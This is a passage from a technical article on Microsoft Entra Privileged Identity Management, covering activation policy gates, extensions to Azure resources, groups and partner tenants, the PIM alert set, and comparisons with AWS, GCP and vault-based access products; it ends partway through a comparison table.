&lt;p&gt;Two of the most common misunderstandings the documentation receives are about this configurability. First, MFA at activation is not universally required by PIM. The role&apos;s activation policy must be set to require it. Second, the activation maximum is configurable per role per scope inside a one-to-twenty-four-hour range, with the default for Global Administrator and Privileged Role Administrator at one hour [@ms-learn-pim-change-default-settings]. A &quot;PIM tenant&quot; where one role requires MFA and approval and another role requires only justification text is a perfectly valid configuration; both roles are PIM-gated, but their gate sets differ.&lt;/p&gt;

A per-role-per-scope configuration of which gates an activation must satisfy: MFA at activation, approval, justification, ticket number, and the activation maximum duration. PIM evaluates the policy at activation time. The gates are independent flags; any combination can be required [@ms-learn-pim-change-default-settings].
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; PIM&apos;s activation maximum duration is configurable per role per scope in the one-to-twenty-four-hour range. The default value for the highest-privileged Entra directory roles -- Global Administrator and Privileged Role Administrator -- is one hour [@ms-learn-pim-change-default-settings]. Other roles default to higher values. Tighten the duration where you can; the activation cost is small, the standing-active surface saving is large.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Authentication context: gating activation, not sign-in&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/inside-the-primary-refresh-token-the-cryptographic-seam-betw/&quot; rel=&quot;noopener&quot;&gt;Conditional Access&lt;/a&gt; has gated sign-in since 2014. Until 2023, it had no way to gate the activation event itself. The integration between PIM and Conditional Access changes that by attaching an &lt;strong&gt;authentication context&lt;/strong&gt; label to the activation, which Conditional Access can target the same way it targets any other authentication. Microsoft Learn includes the activation policy option &lt;em&gt;&quot;On activation, require Microsoft Entra Conditional Access authentication context&quot;&lt;/em&gt; [@ms-learn-pim-change-default-settings].&lt;/p&gt;

A label that PIM attaches to the activation event so that Conditional Access policies can target the activation itself, not just the sign-in. Policies such as &quot;activation of Global Administrator requires a compliant device and an MFA challenge issued within the last five minutes&quot; become expressible without bolting on a third-party stack [@ms-learn-pim-change-default-settings].
&lt;h3&gt;The activation gate, as code&lt;/h3&gt;
&lt;p&gt;To make the gate-composition idea concrete, here is the activation policy as a small JavaScript function. Edit the policy or the request and re-run it.&lt;/p&gt;
&lt;p&gt;{`
function activate(request, policy) {
  // policy gates are independent; any combination can be required
  if (policy.requires_mfa &amp;amp;&amp;amp; !request.mfa_passed) {
    return { ok: false, reason: &apos;MFA challenge failed or absent&apos; };
  }
  if (policy.requires_approval &amp;amp;&amp;amp; !request.approval_decision) {
    return { ok: false, reason: &apos;Approval pending&apos; };
  }
  if (policy.requires_justification &amp;amp;&amp;amp; !request.justification) {
    return { ok: false, reason: &apos;Justification text missing&apos; };
  }
  if (policy.requires_ticket &amp;amp;&amp;amp; !request.ticket_number) {
    return { ok: false, reason: &apos;Ticket number missing&apos; };
  }
  if (request.duration_hours &amp;gt; policy.max_duration_hours) {
    return { ok: false, reason: &apos;Requested duration exceeds policy maximum&apos; };
  }
  // activation succeeds: materialize a time-bound active assignment
  const expires_at = new Date(Date.now() + request.duration_hours * 3600 * 1000);
  return {
    ok: true,
    active_assignment: {
      principal: request.principal,
      role: request.role,
      scope: request.scope,
      type: &apos;active&apos;,
      duration: { kind: &apos;time-bound&apos;, start: new Date(), end: expires_at }
    }
  };
}&lt;/p&gt;
&lt;p&gt;const policy = {
  requires_mfa: true, requires_approval: true,
  requires_justification: true, requires_ticket: true,
  max_duration_hours: 1
};
const request = {
  principal: &apos;&lt;a href=&quot;mailto:alice@contoso.com&quot; rel=&quot;noopener&quot;&gt;alice@contoso.com&lt;/a&gt;&apos;, role: &apos;Global Administrator&apos;, scope: &apos;directory&apos;,
  mfa_passed: true, approval_decision: &apos;approve&apos;,
  justification: &apos;MSRC-2026-PIM-12345&apos;, ticket_number: &apos;SNOW-INC-987654&apos;,
  duration_hours: 1
};
console.log(activate(request, policy));
`}&lt;/p&gt;
&lt;p&gt;The function is mechanical and short for a reason. Every PIM gate is independently expressible, the policy is a record, the request is a record, and the active-assignment output is itself a record the system can audit. The complexity of PIM, such as it is, lives in the surrounding infrastructure -- the directory, the audit log, Conditional Access, the alert engine -- not in the gate itself.&lt;/p&gt;
&lt;h3&gt;The Azure-resource five-minute floor&lt;/h3&gt;
&lt;p&gt;One operational detail belongs here.Azure resource role assignments under PIM-for-Azure-Resources carry an additional latency floor: an Azure resource role assignment cannot be made for a duration of less than five minutes and cannot be removed within five minutes of being created [@ms-learn-pim-resource-roles]. This is the rare place where the cloud control plane exposes a hard minimum-time bound in its assignment-state machine, and it shapes the lower limit of any tightening strategy on Azure RBAC scopes.&lt;/p&gt;
&lt;p&gt;Activation is the per-event control. But what about the standing posture across the tenant -- the eligibility surface, the drift you did not notice, the assignment configuration in places PIM does not reach by default? For that, you need access reviews, and you need to push the eligible/active primitive beyond the original twenty-eight built-in directory roles.&lt;/p&gt;
&lt;h2&gt;6. Beyond Directory Roles: Extending Eligible and Active Across Four Boundaries&lt;/h2&gt;
&lt;p&gt;PIM at GA in September 2016 covered roughly twenty-eight built-in Entra directory roles. Everything else -- Azure RBAC, security groups, partner-tenant delegation, the Conditional Access activation event -- was still single-state and permanent-active. The next nine years of PIM history are the story of closing those four boundaries, one at a time.&lt;/p&gt;

flowchart TD
    Core[&quot;Two-state assignment object, 2016&quot;]
    Core --&amp;gt; Azure[&quot;PIM for Azure Resources, 2017-2019, RBAC at four scopes&quot;]
    Core --&amp;gt; Groups[&quot;PIM for Groups, GA October 2023, membership and ownership&quot;]
    Core --&amp;gt; Partner[&quot;GDAP May 2022 plus Azure Lighthouse eligible authorizations&quot;]
    Core --&amp;gt; CA[&quot;PIM with Conditional Access authentication context, GA October 2023&quot;]
&lt;h3&gt;Boundary 1: PIM for Azure Resources&lt;/h3&gt;
&lt;p&gt;Between 2017 and 2019, Microsoft extended the eligible-versus-active model from Entra directory roles to Azure RBAC. The extension covers four scopes -- management group, subscription, resource group, and individual resource -- and supports both built-in roles (Owner, Contributor, User Access Administrator, and the security roles) and custom roles [@ms-learn-pim-resource-roles].&lt;/p&gt;
&lt;p&gt;The non-obvious operational property of PIM-for-Azure-Resources is that &lt;strong&gt;role settings do not inherit down the RBAC hierarchy&lt;/strong&gt;. A policy you tighten on Owner at the management-group scope does not automatically flow down to Owner on subscriptions, resource groups, or resources beneath it. Each (role, scope) pair is its own policy slot, and each must be configured.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Configure activation policies per role per scope explicitly across the management-group, subscription, resource-group, and resource hierarchy. A tightening at the management-group scope does not flow to subscriptions beneath it. The most common operational defect in mature PIM tenants is the unconfigured policy at a downstream scope, leaving a wide-open activation surface under what looked like a hardened parent.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Boundary 2: PIM for Groups&lt;/h3&gt;
&lt;p&gt;The PIM-for-Groups timeline is three distinct events. In August 2020, Microsoft previewed the feature under its original name, &quot;Privileged Access Groups,&quot; and limited the preview scope to role-assignable security groups [@simons-2020-aug]. In January 2023, Microsoft renamed the feature to &quot;Privileged Identity Management for Groups&quot; in the Entra admin centre; the underlying eligible/active model was unchanged [@ms-learn-pim-for-groups]. In October 2023, more than three years after the preview, PIM for Groups reached general availability with a broader scope -- role-assignable security groups (carried forward), non-role-assignable security groups (newly supported), and Microsoft 365 groups (newly supported), with JIT for both membership and ownership [@ms-techcommunity-pim-groups-ca-ga-2023], [@ms-learn-pim-for-groups], [@ms-learn-pim-groups-role-settings].The three events span more than three years and should not be conflated. August 2020: preview of &quot;Privileged Access Groups,&quot; role-assignable security groups only [@simons-2020-aug]. January 2023: rename to &quot;PIM for Groups&quot;; same scope and model [@ms-learn-pim-for-groups]. October 2023: general availability with the broader scope (non-role-assignable security groups plus M365 groups), and JIT for both membership and ownership [@ms-techcommunity-pim-groups-ca-ga-2023]. Two structural exclusions persist throughout: dynamic-membership groups and groups synchronized from on-premises Active Directory [@ms-learn-pim-for-groups]. The scope is broad: any Entra security group and any Microsoft 365 group, except dynamic-membership groups and on-premises-synced groups, can be PIM-enabled [@ms-learn-pim-for-groups].&lt;/p&gt;
&lt;p&gt;The interesting design choice is that PIM-for-Groups gates &lt;strong&gt;two distinct surfaces per group&lt;/strong&gt;: membership and ownership. The two surfaces each get their own activation policy [@ms-learn-pim-groups-role-settings].&lt;/p&gt;

The extension of PIM eligible/active assignment to Entra security groups and Microsoft 365 groups. Originally previewed in August 2020 as &quot;Privileged Access Groups&quot; (role-assignable security groups only) [@simons-2020-aug]; renamed to &quot;PIM for Groups&quot; in January 2023 [@ms-learn-pim-for-groups]; reached general availability in October 2023 with the broader scope (role-assignable security groups, non-role-assignable security groups, and M365 groups), with JIT for both membership and ownership [@ms-techcommunity-pim-groups-ca-ga-2023]. Excludes dynamic-membership groups and groups synchronized from on-premises environments [@ms-learn-pim-for-groups], [@ms-learn-pim-groups-role-settings].

A group owner can add members. A privileged access group whose membership is PIM-gated but whose ownership is permanent-active offers an unmediated elevation path: a compromised owner adds themselves as a member, bypassing the membership gate they would have had to activate. PIM-for-Groups gates both surfaces because gating membership without gating ownership is a one-bypass-step elevation. The two policies are independent; both must be set.
&lt;h3&gt;Boundary 3: Partner tenants -- GDAP and Azure Lighthouse&lt;/h3&gt;
&lt;p&gt;Until 2022, the Microsoft partner channel -- Cloud Solution Providers and Managed Service Providers -- worked through a model called &lt;strong&gt;Delegated Admin Privileges (DAP)&lt;/strong&gt;, in which the partner held standing Global Administrator on every customer tenant they touched. The Nobelium supply-chain attack tradition of 2020-2021 made the structural risk of that posture unignorable [@cisa-aa20-352a]: one compromise of one partner credential meant Global Administrator across hundreds or thousands of customer tenants simultaneously.&lt;/p&gt;
&lt;p&gt;In May 2022, Microsoft introduced &lt;strong&gt;Granular Delegated Admin Privileges (GDAP)&lt;/strong&gt; [@ms-learn-gdap], [@crayon-gdap]. GDAP replaces the standing-GA pattern with time-bound (one to seven-hundred-thirty days) and role-scoped delegation between partner and customer tenants. Microsoft Learn&apos;s framing makes the design explicit: &lt;em&gt;&quot;GDAP is a security feature that provides partners with least-privileged access following the Zero Trust cybersecurity protocol. It lets partners configure granular and time-bound access to their customers&apos; workloads in production and sandbox environments. Customers must explicitly grant the least-privileged access to their partners&quot;&lt;/em&gt; [@ms-learn-gdap].&lt;/p&gt;

The May 2022 Microsoft Partner Center capability that replaces legacy DAP&apos;s standing-Global-Administrator-on-every-customer-tenant pattern with time-bound (one to seven-hundred-thirty days) and role-scoped delegation between partner and customer tenants. GDAP is the partner-tenant analogue of PIM eligible assignment [@ms-learn-gdap].
&lt;p&gt;The Azure plane has a parallel construct. &lt;strong&gt;Azure Lighthouse eligible authorizations&lt;/strong&gt;, introduced alongside GDAP, extend PIM-for-Azure-Resources eligibility across the tenant boundary [@ms-learn-lighthouse-eligible]. The customer (not the partner) controls the PIM policy on the delegated authorization. One important exception: service principals cannot use eligible authorizations, because there is currently no way for a service principal to elevate its access [@ms-learn-lighthouse-eligible]. The application-identity gap we reach in section 9 reaches into Lighthouse too.&lt;/p&gt;
&lt;h3&gt;Boundary 4: PIM and Conditional Access authentication context&lt;/h3&gt;
&lt;p&gt;The October 2023 GA wave closed the activation-gate-versus-sign-in-gate gap. Before October 2023, Conditional Access could gate sign-in into the tenant, but it could not gate the activation event itself. After October 2023, an authentication-context-tagged Conditional Access policy can target activation specifically [@ms-techcommunity-pim-groups-ca-ga-2023]. A policy of the form &lt;em&gt;&quot;activation of any control-plane role requires a compliant device and a fresh MFA challenge&quot;&lt;/em&gt; becomes expressible without third-party tooling [@ms-learn-pim-change-default-settings].&lt;/p&gt;
&lt;h3&gt;The retirement of Tier-0, Tier-1, Tier-2&lt;/h3&gt;
&lt;p&gt;The umbrella framing has also shifted. Microsoft&apos;s 2014 Tier-0 / Tier-1 / Tier-2 model is being progressively retired in favour of the &lt;strong&gt;Enterprise Access Model (EAM)&lt;/strong&gt;, which uses control plane, management plane, and data/workload plane as the structural divisions [@ms-learn-eam]. EAM is cloud-native where Tier-0/1/2 was on-premises-centric. Microsoft Learn states the mapping: &lt;em&gt;&quot;Tier 0 expands to become the control plane and addresses all aspects of access control&quot;&lt;/em&gt;, and &lt;em&gt;&quot;what was tier 1 is now split into the following areas: Management plane ... Data/Workload plane&quot;&lt;/em&gt; [@ms-learn-eam].&lt;/p&gt;

The post-2021 Microsoft reference architecture that replaces the Tier-0/Tier-1/Tier-2 administrative model with a plane-based division: control plane, management plane, and data/workload plane. EAM is cloud-native and zero-trust-friendly where Tier-0/1/2 was on-premises-centric [@ms-learn-eam]. Microsoft&apos;s RaMP -- the Rapid Modernization Plan -- is the post-2018 deployment roadmap that operationalizes EAM [@ms-docs-github-ramp].
&lt;p&gt;The retirement is partial. The practitioner audience still uses Tier-0/1/2 more often than EAM in day-to-day language. The Microsoft Learn page for Securing Privileged Access explicitly cross-references both [@ms-learn-spa-overview].&lt;/p&gt;
&lt;p&gt;Coverage is one half of the story. The other half is detection. What does PIM do when someone in the Privileged Role Administrator role simply assigns Global Administrator to a user directly through Microsoft Graph, bypassing the activation workflow entirely?&lt;/p&gt;
&lt;h2&gt;7. The Detection Layer: Six PIM Alerts and the Assignment-Bypass Class&lt;/h2&gt;
&lt;p&gt;PIM gates activation. The first question every adversary thinks of, and every architect should think of next, is: what about the assignment itself? What happens when someone in the Privileged Role Administrator role just creates a permanent-active Global Administrator assignment directly, skipping the eligible-to-active workflow entirely?&lt;/p&gt;
&lt;p&gt;The answer is the article&apos;s second aha moment, and it is deliberately surprising.&lt;/p&gt;
&lt;h3&gt;The six PIM Alerts&lt;/h3&gt;
&lt;p&gt;Microsoft Learn documents seven named alerts in the PIM Alerts surface for Microsoft Entra roles [@ms-learn-pim-alerts]. Six of them are behavioural detections; the seventh is a licensing-precondition alert that fires when the tenant lacks the appropriate license.The seventh alert, named &quot;The organization doesn&apos;t have Microsoft Entra ID P2 or Microsoft Entra ID Governance,&quot; is a low-severity licensing-precondition alert. The &quot;six PIM Alerts&quot; framing in this article refers to the six behavioural alerts; the licensing alert is structurally distinct. The six behavioural alerts, with the canonical names verbatim from the documentation, are:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Alert (verbatim)&lt;/th&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;What it detects&lt;/th&gt;
&lt;th&gt;Configurable threshold&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;There are too many Global Administrators&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Tenant exceeds a tunable count and percentage of standing GAs&lt;/td&gt;
&lt;td&gt;Minimum count 2-100 and percentage 0-100%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Roles are being assigned outside of Privileged Identity Management&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;High&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;A privileged role assignment was created via Microsoft Graph or the classic admin centre without going through PIM&lt;/td&gt;
&lt;td&gt;None (binary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Roles are being activated too frequently&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Post-hoc activation-frequency anomaly&lt;/td&gt;
&lt;td&gt;Activation count and time window&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Administrators aren&apos;t using their privileged roles&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Staleness on activation; eligible assignment unused&lt;/td&gt;
&lt;td&gt;0-100 day threshold&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Roles don&apos;t require multifactor authentication for activation&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Configuration drift on the per-role activation policy&lt;/td&gt;
&lt;td&gt;None (binary on role policy)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Potential stale accounts in a privileged role&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Sign-in staleness on a privileged principal&lt;/td&gt;
&lt;td&gt;1-365 day threshold&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The third row -- &quot;Roles are being assigned outside of Privileged Identity Management&quot; -- is the load-bearing one. Microsoft Learn rates it &lt;strong&gt;High&lt;/strong&gt; severity because it is the alert that fires when somebody routed around PIM entirely [@ms-learn-pim-alerts]. The verbatim documentation reads: &lt;em&gt;&quot;Privileged role assignments made outside of Privileged Identity Management aren&apos;t properly monitored and might indicate an active attack&quot;&lt;/em&gt; [@ms-learn-pim-alerts].&lt;/p&gt;

The High-severity PIM Alert &quot;Roles are being assigned outside of Privileged Identity Management.&quot; It fires when a privileged role is assigned via a path other than PIM -- typically via Microsoft Graph, the classic admin centre assignment surface, or PowerShell. The alert is detective. It fires after the assignment is created [@ms-learn-pim-alerts].
&lt;h3&gt;Detective, not preventive -- and why&lt;/h3&gt;
&lt;p&gt;Read the definition again. The alert fires &lt;em&gt;after&lt;/em&gt; the assignment is created. PIM does not block direct assignments outside its workflow.&lt;/p&gt;
&lt;p&gt;For most architects this lands hard. The reasonable next thought is &quot;if PIM does not block the bypass, what is the point?&quot; Sit with that thought, then read the design rationale.&lt;/p&gt;
&lt;p&gt;The Microsoft Graph endpoints that allow direct role assignment are the integration surface every legitimate administrative tool uses. Identity Governance products use them. CI/CD identity provisioning scripts use them. Break-glass automations use them. Microsoft&apos;s own admin centres use them in some configurations. The customer-side tools that scan, audit, remediate, and provision against the tenant use them. A preventive block on direct assignment would break every one of those integrations. It would also break PIM itself; the eligible-to-active materialization step is a write to the same assignment surface.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; PIM does not block direct role assignments outside its workflow because blocking would break the Microsoft Graph integration surface every legitimate administrative tool uses. The High-severity assignment-bypass alert is detective: it fires after the assignment is created. Customers who need preventive blocking layer a separate Conditional Access policy on the Graph endpoint, an Azure Policy at the management-group scope, or an entitlement-management workflow on top of PIM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is Aha #2. The reader who walked in expecting PIM to be a &quot;deny direct assignments&quot; product walks out understanding why the design says &quot;alert loudly via High severity, then let the customer layer preventive controls based on their tooling estate.&quot; The trade-off is named, not hidden.&lt;/p&gt;
&lt;h3&gt;The 1000-notification ceiling and the SIEM-side correlation&lt;/h3&gt;
&lt;p&gt;One operational footnote and one wider observation. The notification fan-out has a hard cap: &lt;em&gt;&quot;The maximum number of notifications sent per one event is 1000. If the number of recipients exceeds 1000, only the first 1000 recipients will receive an email notification&quot;&lt;/em&gt; [@ms-learn-pim-alerts]. Very large tenants whose privileged groups exceed the cap should not rely on email-notification fan-out alone.The detection layer beyond PIM Alerts is Microsoft Sentinel UEBA, which builds dynamic behavioural profiles for users, hosts, IP addresses, applications, and other entities and emits anomaly scores against &lt;code&gt;AuditLogs&lt;/code&gt; operations including role-eligibility additions and activations [@ms-learn-sentinel-ueba]. Sentinel UEBA is the closest 2026 Microsoft-shipped activation-anomaly-scoring surface; it is detective SIEM correlation, not synchronous gating.&lt;/p&gt;
&lt;p&gt;The wider observation is that the PIM detection layer is one piece of a larger pipeline. PIM Alerts give you the High-severity assignment-bypass detection. Microsoft Sentinel UEBA gives you per-user behavioural-anomaly scoring against the audit-log events [@ms-learn-sentinel-ueba]. Entra ID Protection gives you sign-in-risk and user-risk classifications for the principal whose token was used. The mature 2026 deployment correlates all three; the assignment-bypass alert is the floor of that pipeline, not the ceiling.&lt;/p&gt;
&lt;p&gt;Microsoft solved the JIT-admin problem with a two-state assignment object, four extension surfaces, and a six-alert detection layer. Did the rest of the industry agree? Look at what AWS and Google bet on, and at the third-party vault market that predates both.&lt;/p&gt;
&lt;h2&gt;8. Competing Architectures: AWS Sessions, GCP Bindings, and the Vault Model&lt;/h2&gt;
&lt;p&gt;Microsoft bet on a two-state assignment object. The rest of the industry placed different bets.&lt;/p&gt;
&lt;p&gt;AWS bet on the session credential. Google bet on the conditional binding. The third-party PAM market bet on the vault. HashiCorp bet on the ephemeral credential. Each architecture is a different answer to one question: &lt;em&gt;what should be the bounded unit of privilege?&lt;/em&gt; PIM bounds the assignment state; AWS bounds the session; GCP bounds the binding; CyberArk and Vault bound the credential. The methods are architecturally distinct, and they coexist in real estates more often than they compete.&lt;/p&gt;
&lt;h3&gt;AWS: bound the session&lt;/h3&gt;
&lt;p&gt;AWS IAM Identity Center plus the Security Token Service &lt;code&gt;AssumeRole&lt;/code&gt; API bound the &lt;em&gt;session&lt;/em&gt;, not the &lt;em&gt;assignment&lt;/em&gt;. Permanent role-bindings -- permission sets attached to identities -- are themselves standing. The temporary part is the session that materializes when the identity calls &lt;code&gt;AssumeRole&lt;/code&gt;. AWS documents this directly: &lt;em&gt;&quot;Temporary security credentials are short-term, as the name implies. They can be configured to last for anywhere from a few minutes to several hours. After the credentials expire, AWS no longer recognizes them or allows any kind of access from API requests made with them&quot;&lt;/em&gt; [@aws-temp-creds].&lt;/p&gt;
&lt;p&gt;The session lifecycle is concrete. &lt;code&gt;AssumeRole&lt;/code&gt; returns an access key, a secret key, and a session token, with a minimum fifteen-minute and a maximum twelve-hour session duration; the API operation default is one hour [@aws-roles-use]. IAM Identity Center permission sets ship with a one-hour default and a one-to-twelve-hour configurable range [@aws-sessionduration].&lt;/p&gt;

The AWS Security Token Service API by which a principal materializes a time-bounded session credential -- access key, secret key, session token -- from a permanent role-binding. The session is the ephemeral artifact; the binding is permanent [@aws-temp-creds], [@aws-roles-use].
&lt;p&gt;The AWS approach has clear strengths in multi-account AWS Organizations and in programmatic access. It is also the natural fit for any workload that needs short-lived credentials. The gaps relative to PIM: no built-in approval workflow, no equivalent of the PIM Alerts surface, and no eligible-versus-active distinction on the role-binding itself. A standing AssumeRole grant is, structurally, standing privilege; what is bounded is the session that consumes it.&lt;/p&gt;
&lt;h3&gt;Google Cloud: bound the binding&lt;/h3&gt;
&lt;p&gt;Google Cloud IAM took a different route. &lt;strong&gt;IAM Conditional Bindings&lt;/strong&gt; let an allow policy include a Common Expression Language predicate that is evaluated at request time. The canonical temporal pattern is &lt;code&gt;request.time &amp;lt; timestamp(...)&lt;/code&gt;, which expires the binding at a wall-clock instant [@gcp-conditions]. There is a practical ceiling of one hundred conditional bindings per allow policy.&lt;/p&gt;
&lt;p&gt;On top of conditional bindings, Google launched &lt;strong&gt;Privileged Access Manager (PAM)&lt;/strong&gt; in public preview in May 2024 [@gcp-iam-release-notes], [@gcp-pam]. PAM adds the entitlement-and-grant workflow that PIM ships natively: eligible principals, eligible roles, max duration, justification, approvers, and notifications, with grant duration enforced by the underlying conditional binding revocation. Audit-event correlation is documented in a separate page [@gcp-pam-audit].&lt;/p&gt;

A Google Cloud IAM role binding that includes a Common Expression Language predicate evaluated at request time. The most common temporal pattern, `request.time &amp;lt; timestamp(...)`, expires the binding at a wall-clock instant; Google Cloud Privileged Access Manager layers an entitlement-and-grant workflow on top [@gcp-conditions], [@gcp-pam].
&lt;p&gt;The GCP approach is the closest hyperscaler analogue to PIM&apos;s eligible/active model in architecture, but the PAM productization shipped in preview in May 2024 [@gcp-iam-release-notes] -- nearly a decade after Azure AD PIM&apos;s 2016 GA -- and the alert and detection surfaces are correspondingly less mature.&lt;/p&gt;
&lt;h3&gt;The third-party vault: CyberArk, BeyondTrust, Delinea&lt;/h3&gt;
&lt;p&gt;The longest-standing answer is the one the third-party PAM market built. CyberArk, BeyondTrust, and Delinea -- all three 2024 Gartner Magic Quadrant Leaders for Privileged Access Management [@cyberark-press-2024], [@beyondtrust-press-2024], [@delinea-press-2024] -- bound the &lt;em&gt;credential&lt;/em&gt;, not the assignment or the session. The credential exists permanently in the vault; access to the credential is bounded by session brokering, periodic password rotation, and full session recording.&lt;/p&gt;
&lt;p&gt;The vault model has structural strengths PIM&apos;s role-assignment-state model cannot match. The vault covers heterogeneous estates that include Windows, Linux, network devices, databases, mainframes, and OT/SCADA appliances -- every system whose credentials cannot be re-architected to a cloud-IAM eligible-active object. Vault-and-broker products provide session recording for SOX and PCI-DSS evidence collection, and they integrate with credential-rotation workflows for legacy vendor appliances whose hard-coded credentials cannot be eliminated.&lt;/p&gt;
&lt;p&gt;Most large enterprises run &lt;em&gt;both&lt;/em&gt; Entra PIM (for Entra and Azure role assignments) and a third-party PAM product (for SSH, on-premises service accounts, database passwords, network devices). The two markets are complements more than substitutes.&lt;/p&gt;
&lt;h3&gt;HashiCorp Vault and OpenBao: bound the credential&apos;s lifetime&lt;/h3&gt;
&lt;p&gt;HashiCorp Vault took the credential-bounded idea and made it ephemeral through &lt;strong&gt;dynamic secrets&lt;/strong&gt;: a credential materialized on demand by Vault for a configured backend (a database, a cloud IAM, a PKI), returned with a lease and TTL, and revoked at the backend when the lease expires [@vault-databases]. The OpenBao fork, governed under the Linux Foundation, preserves the same dynamic-credential semantics [@openbao].OpenBao was created in late 2023 after HashiCorp moved Vault from the open-source MPL to the Business Source License. The Linux Foundation announced on April 30, 2024 that OpenBao would join &lt;strong&gt;LF Edge&lt;/strong&gt; as one of four new projects (alongside EdgeLake, InfiniEdgeAI, and InstantX) at the Open Networking and Edge (ONE) Summit [@lfedge-openbao-2024]. The dynamic-secret primitive -- &quot;create a credential, hand it out, revoke it at lease expiry&quot; -- is preserved on both code lines.&lt;/p&gt;

A credential materialized by Vault on demand for a configured backend -- database, cloud IAM, or PKI -- returned with a lease ID and TTL; at lease expiry Vault revokes the credential at the backend. The canonical 2026 open-source primitive for replacing hard-coded application credentials [@vault-databases].
&lt;p&gt;The Vault story matters for our purposes because it is the strongest 2026 coverage of the &lt;em&gt;application-identity surface&lt;/em&gt; -- dynamic database credentials, Kubernetes service-account tokens, cloud-IAM short-lived credentials. PIM does not cover that surface today; Vault does. This previews the open boundary in section 9.&lt;/p&gt;
&lt;h3&gt;What is bound, in one comparison table&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;What is bound&lt;/th&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;th&gt;Default duration&lt;/th&gt;
&lt;th&gt;Approval workflow&lt;/th&gt;
&lt;th&gt;Detection layer&lt;/th&gt;
&lt;th&gt;Partner tenant&lt;/th&gt;
&lt;th&gt;Application identities&lt;/th&gt;
&lt;th&gt;License&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Entra PIM&lt;/td&gt;
&lt;td&gt;Assignment state&lt;/td&gt;
&lt;td&gt;eligible -&amp;gt; active transition with policy gates&lt;/td&gt;
&lt;td&gt;1h (Global Admin)&lt;/td&gt;
&lt;td&gt;Built-in approver routing&lt;/td&gt;
&lt;td&gt;Six behavioural PIM Alerts plus Sentinel UEBA&lt;/td&gt;
&lt;td&gt;GDAP + Lighthouse&lt;/td&gt;
&lt;td&gt;Not yet (open boundary)&lt;/td&gt;
&lt;td&gt;Entra ID P2 or Entra ID Governance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS IAM Identity Center + STS&lt;/td&gt;
&lt;td&gt;Session credential&lt;/td&gt;
&lt;td&gt;AssumeRole returns access/secret/session token&lt;/td&gt;
&lt;td&gt;1h&lt;/td&gt;
&lt;td&gt;Not built-in&lt;/td&gt;
&lt;td&gt;Not equivalent to PIM Alerts&lt;/td&gt;
&lt;td&gt;Not directly comparable&lt;/td&gt;
&lt;td&gt;Strong (short-lived creds native)&lt;/td&gt;
&lt;td&gt;Included in AWS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GCP IAM + PAM&lt;/td&gt;
&lt;td&gt;Policy binding&lt;/td&gt;
&lt;td&gt;CEL predicate plus entitlement-and-grant&lt;/td&gt;
&lt;td&gt;Per entitlement&lt;/td&gt;
&lt;td&gt;Built-in via PAM&lt;/td&gt;
&lt;td&gt;Audit events plus Cloud Audit Logs&lt;/td&gt;
&lt;td&gt;Cross-org via folders&lt;/td&gt;
&lt;td&gt;Service-account impersonation&lt;/td&gt;
&lt;td&gt;Included in GCP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CyberArk/BeyondTrust/Delinea&lt;/td&gt;
&lt;td&gt;Credential knowledge&lt;/td&gt;
&lt;td&gt;Vault stores, broker hands out, rotates&lt;/td&gt;
&lt;td&gt;Per session policy&lt;/td&gt;
&lt;td&gt;Built-in approver routing&lt;/td&gt;
&lt;td&gt;Session recording, full SIEM integration&lt;/td&gt;
&lt;td&gt;Per-tenant deployment&lt;/td&gt;
&lt;td&gt;Coverage via shared accounts&lt;/td&gt;
&lt;td&gt;Per-seat commercial&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HashiCorp Vault / OpenBao&lt;/td&gt;
&lt;td&gt;Credential lifetime&lt;/td&gt;
&lt;td&gt;Lease-based revocation, dynamic secrets&lt;/td&gt;
&lt;td&gt;Per backend, per lease&lt;/td&gt;
&lt;td&gt;Optional plugins&lt;/td&gt;
&lt;td&gt;Audit log; lease events&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;Strong (dynamic secrets)&lt;/td&gt;
